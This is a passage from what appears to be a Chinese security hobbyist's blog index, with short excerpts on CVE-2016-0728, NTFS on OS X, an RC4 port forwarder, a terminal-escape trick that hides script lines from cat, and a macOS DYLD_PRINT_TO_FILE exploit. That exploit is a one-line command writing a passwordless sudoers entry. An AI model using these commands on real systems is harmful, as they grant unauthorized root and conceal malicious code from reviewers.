看看CVE-2016-0728

上周末看了下cve-2016-0728 linux本地提权漏洞,今天记录一下。

这个漏洞主要是因为keyrings内核组件的引用泄露引起的。

此内核对象采用一个32位无符号整数做引用计数,但在引用计数溢出的时候没有进行合理的错误处理,所以当对此对象引用到达4G时会使引用计数回到0,内核在检测到此引用计数为0时会析构对象释放空间。而此时r3程序还保留有内核对象的引用,如此就形成了一个UAF漏洞。

印象中这种整形溢出造成的严重漏洞还真不少,本着实践出真知的态度实践一下。

原文中提到:

“Addres......

2016 - 01 - 27

osx读写ntfs

作为国际大厂,苹果故意不支持巨硬家的ntfs文件系统未免有点小心眼。

升了el capitan后希捷自家的ntfs支持软件不能用了,只好寻求其他写入ntfs的方式。

google一番找到了个不算优雅但还凑合的方案,在此记录一下。

接入ntfs移动硬盘root shell编辑/etc/fstab内容

如:

LABEL=DRIVE_NAME none ntfs rw,auto,nobrowse

其中DRIVE_NAME是连入设备的卷标,注意若卷标含空格则使用“\ ”转义符。

此时重连设备可在/Vo......

2016 - 01 - 24

python asyncore实现端口转发

最近Digital Ocean的VPS直连一直连不上,怀疑是功夫王根据ssh的流量特征做了拦截,遂写了个脚本实现RC4加密的端口转发(主要目的是规避流量特征的分析)。

python的asyncore库是一个异步的socket通信库。

一个简单的使用示例如下:

import asyncore, socket

class HTTPClient(asyncore.dispatcher): # 继承dispatcher类

def __init__(self, host,......

2015 - 10 - 01

A shell trick

码瘟给我发了个好玩的东西

printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' >backdoor.sh

chmod +x backdoor.sh

cat backdoor.sh

./backdoor.sh

man ascii 查了下\033是ESC,理论上通过这种控制符能玩出很多花样。

相关链接

2015 - 09 - 30

Mac OSX yosemite本地提权漏洞

昨晚在freebuf上看到一篇mac下恶意软件的分析文章,软件利用前段时间有报道过的DYLD_PRINT_TO_FILE环境变量来实现本地提权免密码root安装。

脚本思路大致如下:

echo "echo \"$(whoami) ALL=(ALL) NOPASSWD:ALL\" >&3 "|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo -s dosomethingroot

DYLD全称dynami......

2015 - 08 - 07